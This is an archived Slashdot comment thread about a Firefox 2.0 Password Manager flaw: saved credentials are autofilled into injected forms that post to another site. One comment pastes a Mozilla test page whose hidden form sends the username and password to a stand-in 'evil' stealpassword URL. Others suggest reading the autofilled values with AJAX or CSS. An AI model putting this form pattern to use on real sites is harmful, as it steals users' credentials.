Slashdot Mirror
Firefox 2.0 Password Manager Bug Exposes Passwords
zbuffered writes, "Today, Mozilla made public bug #360493, which exposes Firefox's Password Manager on many public sites. The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain. For example, username/password input tags on a Myspace user's site will be unhelpfully propagated with the visitor's Myspace.com credentials. It was first discovered in the wild by Netcraft on Oct. 27. As this proof-of-concept illustrates, because the username/password fields need not be visible on the page, your password can be stolen in an almost completely transparent fashion. Stopgap solutions include avoiding using Password Manager and the Master Password Timeout Firefox extension, which will at least cause a prompt before the fields are filled. However, in the original case detailed in the bug report, the phish mimicked the login.myspace.com site almost perfectly, causing many users to believe they needed to log in. A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability, is available from the bug's original author."
...secure by design!!
...as though millions of Firefox users were laughing at IE users, and were suddenly silenced.
Cue "still more secure" arguments now.
Now that its 2006, can we now use a better form of "authentication" than a few ascii characters?
Every website wants you to have a password. You know, for important stuff like making a purchase because you use a password for a purchase at a brick and mortar store, right?
Well, since its a good practice to use unique passwords, and users get forgetful, then they use the web browser tool to store their passwords, then they forget their passwords, and when they use another computer or update their existing one, their tool does not work, and if it does work, then the browser gives away your passwords.
I don't use a password to get into my home, I don't start my car with a password, I don't use a password to get into my work. In fact, I don't even have a key for my work, server room, nothing (RFID). But all day at work, these programs continually ask for my password to the point that I dont consider my password secure because I have to change it, and use it so much, I'm desensisized (sp?) and say who cares?
Can we get over passwords soon?
People actually let their browsers remember their passwords? I have never trusted my browser that much.
The masses are the crack whores of religion.
Stopgaps solutions are not a solution, I guess they're planning a 2.0.1 soon? The bug has been reported 10 days ago...
The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain.
Worst idea ever. The question isn't why wasn't this discovered earlier, but who decided this was a good idea in the first place?
What?
According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.
So much for me being smug about going back to Firefox 1.5!
A pizza of radius z and thickness a has a volume of pi z z a
...using Microsoft Internet Explorer. AAaaaaaaaaaaaargh!
If you mod me down, I shall become more powerful than you could possibly imagine.
My feeling is, people who rely on "password managers" get what they deserve when their passwords end up in the wrong hands. It's generally just a bad idea to store passwords anywhere but your head.
+0 Meh
RTFA?
The hell, you say.
'Tis slashdot, bucko:
No read-read today.
Always for good suds we pray.
Burma Shave
Get thee glass eyes, and, like a scurvy politician, seem to see things thou dost not.--King Lear
It also took me a while to figure out how to remove the close button from each tab. The tab scrolling "feature" was also a point of great annoyance that took up more of my time to find a fix.
In short I'm just not jumping for joy over FF. This new flaw happens to come to light the day after I search Google for a way to manually add userids and passwords to the FF DB (any ideas?). This was to address the problem of FF not picking up some text fields as userid and password fields. One solution I found was RoboForm, though I'm not sure I want to pay for what I think should be a fairly easy thing to do inside FF. FF is getting better but personally I'd rather be using Mozilla 1.7.x.
I love firefox and am very thankful for it being opensource but I loathe how Mozilla chooses to track and report bugs. I have been going around for days and could've been exploited - possibly but not probably - instead of being able to take appropriate measures to protect myself. It's not like this was some little secret the code was already out in the wild to do it. I find this security through obscurity in opensource projects absolutely disgusting. While we are possibly getting compromised they are sitting on their hands. We, the community, are here to quickly fix problems like these too. Thousands of developers could've and would work on this who the bug was hidden from. This makes the development process absolutely useless...
I thought the rule of thumb for any user-created content was to never allow freeform html? You either let them control their formatting with a separate markup (like BBCode), or you limit them to specific tags (like they do here). In neither of these situations is this exploit possible.
Allowing full html coding, including embedding java or javascript, is an invitation for the unscrupulous. That's one of the 500 reasons I can think of to never visit a website like myspace.
That said, much like language, the web is defined by its users. While I don't feel like it's Firefox's responsibility to fix issues like this, they'd do best to be aware of it. It wouldn't be a bad idea at all to tie password remembering to the exact url (at least everything up to the "?") by default.
Money I owe, money-iy-ay
Of course it's far less shocking that the same bug is present in IE6 and IE7! I wonder which browser you will be recommending... do you know of one that passes the test-case linked to from the bugzilla page?
A pizza of radius z and thickness a has a volume of pi z z a
If you have 50-100 passwords at various sites, established over years, there's really a shortage of other good options. You can go the old-school route and just write them all down on a pad of paper, or the slightly more sophisticated route and put them in a text file or encrypted database on your local machine, but that doesn't help you when you want to log into a site from another machine.
I was disappointed to hear of this vulnerability, because I use Google Browser Sync pretty heavily for keeping track of cookies and trivial passwords, and to be honest I'm not really sure what I'd do without it. More important passwords I keep in an old Palm Pilot using a GPLed password-management and generation program on it, but recalling passwords from it is a pain (takes several minutes to get Palm out, type in master password, etc.).
"Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
That is disturbing to me since I use FF2 to store many of my passwords. However, I don't store passwords for more critical sites, like my bank's website. I recommend others do the same.
I tested IE6 and IE7 and the proof of concept page failed to work in both browsers. Neither browser passes the stored browser on to Google.
Have you personally tested this and found either browser to be vulnerable?
Pax Digitalia
Right, because you contribute to Firefox, right? If you did, you'd of course have been able to spot this bug with your razor-sharp eyes, right? Oh wait... no, I just remembered you're fallible too, and quite possibly an idiot. Firefox is free. The dev team doesn't have to do shit, they choose to. Stop acting like an entitled 8-year-old at Christmas, and do something useful with your time.
ResidntGeek
Perhaps there is code to not work if it detects the User Agent for anything other than FF2.0?
"I am the king of the Romans, and am superior to rules of grammar!"
-Sigismund, Holy Roman Emperor (1368-1437)
I am still using FF1.5 because of all the problems with 2.0. Not just bugs like these, although they are disappointing, but reports of the ever present memory leak and the annoying revamps to the tabs bar. Then again, I am eagerly looking forward to upgrade to a better version so I can get some of the improvements, like crash restoration.
I'm running 1.5 and the exploit worked for me.
I stole this Sig
Does anyone know if this attack is possible on Opera? Opera's wand has been around longer than FireFox has, so I'm kinda curious. It seems like something people could exploit in more than just FireFox.
FanFictionRecs.net
An where's the patch for this? If the bug was hidden from all, then why would they go public with it without a patch? And why would they hide it in the first place? Open source developers could have submitted patches already!
It would seem sort of silly to me to stop advocating Firefox because it has one BIG bug. Most browsers have 100 HUGE bugs. It is still better than any other browser.
I wouldn't think this would be a hard fix. Silly Firefox development team. =)
Firefox 2.0 - Spell Rightly.
There is a neat little piece of javascript at http://www.xs4all.nl/~jlpoutre/BoT/Javascript/Pass wordComposer/ that lets you just think up a master password in your head and then use this applet to automatically generate a site-specific, unique hash and fill in the password field automatically. This way you can remember the passwords easily, you never have to save them or write them down. And if one site gets compromised, that password (the hash) won't work with any other site. The drawback is that if you don't have this piece of javascript then you can't get into your sites.
Did you even look at the source?
Thought until now of multiple personality but mystery solved! It was just my browser!...
PS: I shall not be held accountable for ANY of my comments...
Does anyone know if Konqueror (using KDE Wallet) is affected? And what about other browsers, like Opera, Epiphany, and so on? I'd just like to know how common this type of exploit is.
Damn. I didn't expect that used a blockquote didn't leave HTML intact ... /> /> /> /> />
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>bug 360493</title>
</head>
<body>
<ol>
<li>Enter real name and real password and submit real form.</li>
<li>Choose Remember this password.</li>
<li>Submit fake form</li>
<li>Test fails if evil.mozilla.com gets real password</li>
</ol>
<div>
<form name="real" action="#" method="get">
<div>
real name <input name="name" type="text"
real password <input name="password" type="password"
<input type="submit" value="real form"/>
</div>
</form>
</div>
<div>
<form name="fake" action="http://evil.mozilla.com/stealpassword" method="get">
<div>
fake name <input name="name" type="text"
fake password <input name="password" type="password"
<input type="submit" value="fake form"
</div>
</form>
</div>
</body>
</html>
Remember the Java ring? It had a processor and stored the private key in a tamper resistant case (erases instantly when case is compromised). PC programs would ask the Java ring to sign things. A virus could get bogus signatures while it was connected, but couldn't compromise the key. Unfortunately, it used a funky "One Wire" adaptor to get power and talk to a PC. If only they would reintroduce it in a USB format!
If we follow your flawed logic to its conclusion, you're arguing that an open source project should be immune from criticism because it's charity. Do you think that open source contributors should not be accountable for major security screw ups?
Firefox may be free. However, its developers are just as accountable for their mistakes as Microsoft should be for its own. Firefox gained the market share that it has because of a reputation for security. When the dev staff screw up so badly, it does a lot to erode their reputation. Though I may not contribute to the project, I have a right as an end user to expect a relatively secure product. The occasional, obscure buffer overflow exploit is excusable. A massive flaw in conception, design, and execution is certainly not.
I think that you've misunderstood not only my initial post but also the fundamental philosophy behind the open source movement. If every developer thought as you did, no end users would bother to use your goods. Judging from your haughty demeanor, I suspect you consider this a good thing.
Pax Digitalia
Actually the word is "Filthy".
Same here in 1.5.0.2
... this is just because IE6/7 have poor compatibility with the rest of the world. They can't even support the exploits, anymore, honestly.
OK, jokes aside, someone just released an exploit into the wild which *can't work on IE*. And they presumably still thought they were going to get something of value on it. Hiya, FireFox, welcome to the "visible enough to be a target" club. And it only gets worse. I hope your million bug finding eyes are bright and perky because it only gets worse and it never, ever stops.
Help poke pirates in the eyepatch, arr.
While I agree FF should alert the user, this is not a hole in FF's security architecture. Its rather a software level bug. Moral of the story: 1. don't be lazy and ask your browser to remember your password. 2. if you insist to be lazy, store passwords only for trivial web accounts.
DEERPARK 1.5.0.4 is also vulnerable - based on firefox 1.5
No big deal. Since I use Thunderbird to check my email, and I don't pay for anything, there's nothing worth stealing. "OH NOES! SOMEONEZ HAX0R3D MY YTMND PASSWORD! T3H W0R1D IS 3ND1NG!!!!!!111one1" Seriously, all my important passwords (such as my Slashdot password), are stored in the most important place available: my brain. I figure, "If I can't remember the password for this site, this site is obviously inferior and not worthy of my attention!"
I don't get why posts are limited to 120 characters. Seems unreasonable to me. I mean, just because I like having a real
If you have form autocomplete on, credit card numbers are stored in plaintext on your hard disk too. Bug's been open for .. what about 4 years now.
They refuse to fix it, they say it's not a bug.
I don't think it's vulnerable to this because it's not fully automatic, however, all someone has to do to get your credit card number is type the first digit and it'll fill in the rest.
Their advice, "Don't use autocomplete".
I've had enough abrasive sigs. Kittens are cute and fuzzy.
Though to be clear exactly it will only forward form input to URLs that appear in form inputs on the same site (domain, that is.) Like the article says, it will only allow say a myspace user to steal your myspace password, he won't be able to steal passwords from other domains, though he will be able to use a non-myspace site to collect the stolen information and that's the bigger portion of the problem. I don't know whether I would classify this *only* as a bug in the browser, rather also a bug in the websites for allowing users of the websites to output form HTML tags that don't reference back into the CMS.
In any case, it should be fixed in *both* places -- a lot of wikiware probably also has the potential to allow this exploit, and should be fixed not to. In addition to fixing browsers to check the form URL before autofilling, restricting autofilling form inputs to same-page on the browser side would be a good option to have for the paranoid, but I'm betting it will break a lot of sites ("break" as in require the password to be put in a whole lot of times) that take login information in from more than one URL.
Someone had to do it.
i'm using firefox 2.0 on linux, first my popup blocker would allow the site to open when i clicked on the video like the instructions said, then when i allowed it i just got youtube.com?
"if i'd known it was harmless, i'd have killed it myself"
Just remember your freaking passwords in your head, is it that hard?
I for one only use the browsers store password feature for the most trivial of sites. For more important sites, I use Password Safe. The program and the database fit easily on a thumb drive, and requires a master password to access. It has a user configurable time out, and a double click on an account copies the data to the clipboard for later use, allowing you to foil keyboard based sniffers.
IANAL... But I play one on
I set my agent ID as firefox in Konqueror but the exploit didn't work. Damn, on of the few things user agent can't emulate.
OpenID seems to be the right approach to this. Login once (Passport-like), but to your own server -- it could be a password, a key exchange, whatever, the idea is to produce some sort of session cookie that your server can check. You can login to any other site, but through a process which doesn't give that site any kind of credentials to use on other sites, and you can restrict which sites may check your identity at all.
I'm not sure how this would protect against this kind of vulnerability, but I am convinced it's the right approach, overall, to authentication.
Don't thank God, thank a doctor!
You're actually having a better experience than many people.
About a year ago I helped my father-in-law switch to Firefox. He recent decided to try Firefox 2.0, but had a lot of problems with it. One was that it made his computer slow down a lot. So on the weekend when my wife and I went to visit, I took a look at his PC. Sure enough, it was terribly slow when using Firefox.
See, he has a machine with "only" 512 MB of RAM. What did Firefox do? According to Task Manager, it was consuming 1896 MB of RAM. I remember the number exactly, as it was 100 years before my son was born. Sure enough, the machine would thrash to a terrible extent. I removed all traces of Firefox, and reinstalled it. No third-party plugins were used, yet we found the exact same problems.
Our final solution was Opera. Unlike Firefox, he reports that it hasn't measured above 35 MB of RAM consumption.
Here is a quick clarification about Internet Explorer 6/7.
5 426
The attack at MySpace worked against IE users because many were lured into typing their passwords into a form. I saw this in action. It was almost indistinguishable from the legitimate version.
The Bugzilla reference to IE 6/7 was not a comment on the info-svc proof, but the proof at
https://bugzilla.mozilla.org/attachment.cgi?id=24
That form does some interesting things in both browsers, but it does not reflect a normal client/server situation. IE's password manager behaves differently from Firefox when dealing with forms on more than one page, as in the info-svc proof.
In my opinion, both browsers should raise a warning when a cross-site form is loaded, or have that option.
Enjoy
Robert Chapin
Chapin Information Services, Inc.
I'm using Opera 9.02 under Linux (Kubuntu 6.10), and could not get the proof-of-concept to work with Wand (Opera's Password Management). I don't think this would be much of an issue with any browser, though, if people would just use some common sense and not store passwords for important things like online banking. While it might suck to have someone exploit this for your Slashdot account and start trolling using your UID, it would be nothing more than an inconvenience. Online banking and credit card transactions, on the other hand, would be major problems. So really, this is a non-issue if you are already a security-minded person. The question: How many normal users are security-minded? The answer is, unfortunately, rather obvious, I think.
"We may face a scorched and lifeless earth, but they're accountable to their shareholders first."
If you are falling back on a single password, then that password can be ridiculously secure. I use a big diceware password http://world.std.com/~reinhold/diceware.html, along with a keepass database http://keepass.sourceforge.net/ Assuming that we arent dealing with keyloggers, that is perfectly secure. ...first post
Opera, my one true love... I shall never leave thee.
I have MS password management to control access to my Firefox password manager.
Phew!
668: Neighbour of the Beast
I have two types of passwords: The ones for fluff sites, like Slashdot, Wikipedia, hotmail (a.k.a. Spam box), and so forth, which usually get 1 of 2 passwords. Then for banks and credit cards and what have you, I use real passwords with different ones for each site.
I could care less if someone hacks my Slashdot account or my wikipedia account. The worst thing they can do is vandalize under my name. And as for hotmail, they can have my spam. And were I to have a myspace account, I could care less if someone got that too.
Fortunately, my bank and credit card companies don't allow others to create their own pages, so I'm not too concerned. I suspect this will get fixed long before it becomes a concern for me.
I was poking around a few days ago trying to get a userContent.css file to use a local filesystem png file as a background, without having to resort to huge data: URIs.
Eventually I'd thrown enough random ideas at the problem that I ended up finding out about this nightmare waiting to happen. Just for kicks I tried putting some code in the CSS to alert() all the (supposedly hidden) password values on the page. It worked.
They're just using MD5, which you could reproduce on any computer. In fact, that's how I generate _all_ my passwords:
echo "user:domain:iteration:masterpass" | binary hash | base64 | take first 16 characters
It's a simple algorithm which you don't need to keep secret. Also, you can write down the made-up user/domain/iteration triplets. All you need to keep secure is the master password. Thanks to the iteration, you can lose a generated password without affecting the secrecy of your master password or all the other passwords.
A simpler version would be to take the ASCII hash directly as a password. However, using a binary hash and base64-encoding it allows you to cram more entropy per character into the resulting password.
Of course it runs NetBSD. BTC: 1NT7QvbetmANwaMzhpVL6
They took out the "load images from the originating site only". That was the only safe way I could surf fark.com at work, since forum posters just LOVE to post not-work-safe images. That, and I worry about someone posting an image from a porn site, and the firewall logs would be on me.
I don't mind that the program allows me to be stupid. Big deal...... I do mind however things like drive by hacks, (via activeX) cross-site scripting (ala JavaScript) etc. But do I expect the browser to be my mommy.... NO As for the supposed FF memory leak. That isn't the one that should affect you the most.... Cerebellum Memorus Diareatalis should.
I'm sorry, I'm to tired to be witty at the moment so this message will have to do.
PassPet is a nifty looking extension that hasn't actually been developed. Would help with this problem, as you have to actually click a button to fill in your password.
I just ran the test on 1.5.0.7 and I am not affected.
Somehow Firefox 1.5.0.8 seems to allow this exploit also. Are you sure 1.5.0.7 isn't vulnerable? If so, then wow I guess things went backwards between the two releases.
maybe it doesn't work the same on ubuntu
Although this could actually be why, I ran the test on a Windows XP Pro machine. If this only happens on Windows (though I don't know this for certain) chances are it might not be the Firefox team's fault after all. Interesting that 1passwd appears to have released a new version of their password manager little over a week ago before this exploit became publically known. Mac users might like the OS X keychain integration.
I would love to test whether it works when firefox is using the noscript addon, but I cannot, because I don't use the password manager, it is just retarded to let your browser remember your passwords, really.
Copyright infringement is "piracy" in the same way DRM is "consumer rape"
Or it shows why Debian and Debian based distro's don't like to wait for mozilla for a fix.
The Firefox teams real intent here was to keep all the geek's off myspace, or any "social networking site" for that matter. Shame on all of you for not knowing better!
Not sure I understand what's supposed to happen. After clicking on the vid (on Chapin Information Service's demo), am I supposed to automatically go to Google? Chapin's demo exploit seems to tell me that I would be redirected to Google.com. It didn't...it went to YouTube where I was logged in under my normal user:pass. I didn't see any sign of anything in the address bar revealing my Chapin user:pass. Is the fact that I already had a YouTube account registered with Password Manager what caused the exploit to fail? Also, my popup blocker stopped Chapin's site from launching something first time through. Was this what threw a wrench in it? I tried manually going to Google.com immediately after clicking on the vid another time through (registering the same user:pass as the first time), but I just don't see anything to indicate that the exploit worked (my user:pass from the demo appears in Googe's address bar? Not that I could see.). Can someone please explain in a bit more detail what should have happened? Mozilla's exploit demo seemed to fail as well, dumping me on a "server not found" error page, but maybe that's what it's supposed to do if the exploit worked.
Tried the second demo on Mozilla's bugtracker. My popup blocker stopped a new window from launching. Nothing else happened that I could tell.
Appreciation expressed in advance to anyone who can enlighten me on what I should be experiencing in Firefox 2. Is this a Windows-version-only thing? I'm on Fedora Core 5.
* * * * *
All mankind is divided into three classes: those that are immovable, those that are movable, and those that move.
--Benjamin Franklin
I ran it (the proof of concept) on the same version and it didn't transmit anything to google.
Konqueror _is_ immune, our password storing system was written by a paranoid security expert.
There are options but you do have to know where to look and most people don't. One program I use at both home and work is Oubliette (Windows only I'm afraid).
It's very ease to use and has encryption so I can can carry all my passwords on a USB stick and know even if I lose it no one can get my passwords (unless they hack the master password).
aus.music.scrapbook
I can get into all relevant government sites and many large private sites in Denmark with my government backed digital signature. Digital signatures are supported by the major browsers.
The main problem is that there is a fee for the web site for using it, which means it is not useful for small or amateur sites, they still rely on passwords.
MySpace trusts its users WAYYYY too much. I think it filters out <script tags, but beyond that I make no promises. Any site that needs to warn its users that "using HTML and CSS to hide MySpace's advertisements is not permitted" is asking for it, big time. Note that at least a few profiles do hide the ads anyhow (on those occasions where I visit the site using a browser that will show ads) and some may actually circumvent the scripting restrictions, even.
The advantage is you get to assault your visitors eyes with a combination of bad programming and bad taste... or just bad design in general (links that go to 24px and bold on MouseOver?!? Blue text on blue backgrounds? You get the idea...) You can put up flash (good for music, videos, games, and remote code execution exploits) and forms (doesn't everybody love surveys? What about a way to post comments without scrolling ALL the way to the bottom of the page? Surely you don't have an issue with default buttons that go... somewhere! I know... let's sneak a Password field on there.) I haven't been to the site in a month or two, which means it is settling blissfully into the recesses of my mind...
There's no place I could be, since I've found Serenity...
It is not a bug with firefox, it is a bug with myspace.
I doubt you will find many places other than myspace where this "bug" will be exploited. Why? Because most sites that host user generated content are responsible enough to remove the users ability to post potentially-malicious markup language on the site. These sites strip almost all (if not all) markup and only allow a small handful of decoration tags like BOLD. (Slashdot is a perfect example of allowed html markup)
The problem is that the code on myspace is shoddy at best, and the fact that users can put any kind of html on their myspace page was an accidental result of such. Then when users figured out they could customize their page with css and other markup code they were happy, and so myspace left it in.
Nowadays everyone is so used to myspace letting them customize their page (in a shitty hack sort of way) that if they were to take that aspect away I think myspace would die in a month (I know a lot of girls who only go on myspace so that they can upgrade their page and make it look better by customizing it) so they are not likely to ditch this "feature" of their site.
According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.
They say it exists in IE 6/7, so they don't look like the only fool.
So how do they explain the fact that it really 'doesn't exist' in IE 6/7, and doesn't this make them look even more foolish?
And no I won't defend IE6 or even IE7. But keep the facts where they are; this is not an IE exploit.
history | less ?
Get your own free personal location tracker
Firefox started to dissappoint me. I do still belong to mustdie crowd but FF starts to irritate me.
First, it deletes files when they are dragged into the browser window . IE won't even allow you to do the dragging.
Second, if you are getting messages from your Yahoo groups by e-mail on your gmail account, the Yahoo ads are overlaying the text. IE does not do that.
I can easily foresee that if this will continue I am going to consider switching to some other browser. Any recommendations?
I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
From what I have read, it takes a n00b to be fooled in that way. AFAIU, the phishing succeeds only if you send the autocompleted form. Who in the right mind would send the form that appeared from nowhere? If I do not expect a form in this place, I do not submit it.
I suspect that many bugs like that can be easily avoided by clean behaviour.
I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
I was wondering, if FF or any browser auto-populates your login fields, couldn't someone use Ajax to just grab the values and send them to the server before you even hit submit?
Although it's not a very comfortable conclusion, I have to agree. People promoting OSS are quick to say in response to a suggestion/complaint they don't like "get the source and fix it". I wrote an open source, free program that some people used, and this temptation was strong for me too.
But after thinking about it, I realized that this attitude is *totally useless*. Most of your users are not going to be programmers and if you want to provide something useful, you have to also provide useful support. There are plenty of casual/vanity OSS projects that are just programmers thinking "maybe someone else will like my quick hack", but they don't go anywhere usually.
For every expert, there is an equal and opposite expert. - Arthur C. Clarke
Firefox is far from paranoid, if you as a simple enduser do not know where to set a master password for the password manager, any person able to use your firefox can see all passwords you gave to it, simply by clicking Tools - Options - 'security' - Show Passwords.
"Firefox .. it deletes files when they are dragged into the browser window . IE won't even allow you to do the dragging"
..
Here on FF 2.0 it does no such thing, just opens up in a window, does not delete.
"if you are getting messages from your Yahoo groups by e-mail on your gmail account, the Yahoo ads are overlaying the text. IE does not do that"
I don't understand, does yahoo include adverts in the email. Here on FF 2.0 I have no such problem. I don't even see the adverts in Yahoo as I have adblock enabled.
"I can easily foresee that if this will continue I am going to consider switching to some other browser. Any recommendations?"
Yea, go back to IE7, all the rest are written by sandle wearing, long hair communist hippies
was Re:FF problems
davecb5620@gmail.com
When ever FF is talked about, at least once mention the memory leak problem .. :)
.. 300MB RAM, FF = 52MB.
"he has a machine with "only" 512 MB of RAM. What did Firefox do? According to Task Manager, it was consuming 1896 MB of RAM"
I have never experienced the fabled FF memory problem
was You're lucky. (Score:5, memory leak fud)
davecb5620@gmail.com
Me too. didn't store pass in the pass. manager either, even when I clicked the remember password button. Even with the NoScript extension disabled
Bugs are bugs, they happen.
With Open source many eyes and many hands work to fix the bugs.
With closed source only a small group can see or fix the source, and the "originator" of the program may not even want to acknoledge the bug.
Just switch to Opera. www.opera.com
PENAROL: Seras eterno como el tiempo y floreceras en cada primavera.
I could be mistaken, but couldn't the need for the user to submit the form (request) be sidestepped with AJAX/Web 2.0 scripting, sending the password as soon as the field is populated? Or does the obfuscation of the password field in the browser prevent this?
Open Standards Portal
I just tested it with Seamonkey 1.0.6 (I prefer it over firefox) and the exploit happens on it as well.
Does the name Pavlov ring a bell?
After carefully examining the issue, I come to the conclusion, that for this supposed issue to show up, it means that the legitimate site you are visiting has been hijacked, and a fake login form inserted. If that is the case, the user is liable to enter the username and password. Firefox password manager or not: when the user clicks submit, the password goes to the other site, whether password manager is enabled or not.
Anyone who can inject arbitrary HTML can possibly get your password. This isn't a bug, it's a consequence of submitting your password using an HTML form, and allowing other users fine control of what scripting and form elements appear on the page.
Sites that wish to guard against such attacks should utilize the more robust systems available for authentication, which include: HTTP authentication and Client-side SSL certificates. In both of these cases, a HTML page need not have direct access to the authentication information provided by the user to the web server.
Users of the browser should just be aware that 'password manager' is not an anti-phishing feature in this version of Firefox -- if the site you are visiting wishes to spill your password to another site, when you login, nothing can stop them, whether you use password manager or not. In fact, they can use AJAX to send your password to who knows what other sites in the world, from the moment you start typing it into a HTML form.
I only hit 'save password' for places where it's safe to do, and when I do so, I rather have it err on the side of filling in a password field, than ever have it err on the side of 'not filling in the password', because it thinks a form might be fake. I'll be the judge of that.
Cross-site forms are a feature of HTML. The issue in this case is that a page author can insert a malicious password form on a legitimate site in the first place.
Exploitation of this so called "bug" relies on the site you visit cooperating with the outside site.
That tells me it's not a bug in password manager. The bug is that a site allows a malicious login form to appear on it in the first place. EOM.
Got duped to this one in about 30 seconds... and it's over 10 months old.
Javascript, no. Maybe you're not clear on how this works?
XSS, kind of, yes.
This exploit requires someone be able to insert a <form> element on a trusted site. (A site that you trust at least to have an account with.) The form gets the login info auto-populated by Password Manager, but then submits the results to a different site. This compromises the trusted site's credentials.
I use Password Manager, but rarely let it save passwords. (You're given the option each time, you know.) There are specific situations where it comes in handy for me, and thankfully none of them would expose me to a malicious use of this exploit. So, modulo your lack of specificity on the scenarios that make its use retarded, we agree.
Being security conscious, I (also) use NoScript. The exploit works even with both sites forbidden. So you know. No need for you to go configuring Password Manager to test it. (Which would not have been hard to do — it's a checkbox.)
As for the question of whether this is a Firefox security hole, I think it is. At least partly. Sure, XSS injection is a site-specific vulnerability. That much is the site's fault. But silently performing a credentials fill-in for cross-site form posting in an environment where XSS may happen... This is not ideal. Surely there must be some solution like tying the credentials not just to a domain and/or specific page, but to the triple of URL+form+action. Maybe this is hard to do if the populating is done before the action can be known for sure (as the form action attribute may change after population and before submission).
I can imagine having Firefox perform a check at the moment it attempts to submit: Did we auto-fill the credentials, and is the URL+form+action the same? If so, go ahead. If not, warn user.
Wonder what will come of this all?
The clock is ticking... will Firefox beat IE's response time?
_ 2006_ 2006
according to secunia, IE7 has more severe bugs unpatched, the most severe also affects IE6 and is known since 2006-10-30
http://secunia.com/product/12366/?task=advisories
http://secunia.com/product/12434/?task=advisories
better than any password manager: http://www.passwordmaker.org/
in this age of communication i'm just not getting through
It also won't work on sites that force you to enter your password using buttons (randomly arranged or static). Many banks do this now.
These posts express my own personal views, not those of my employer
Yes, viruses can only spread via sneezes. Oh, don't forgot the good old, I/O shutdown.
But didn't buy the t-shirt
Support my political activism on Patreon.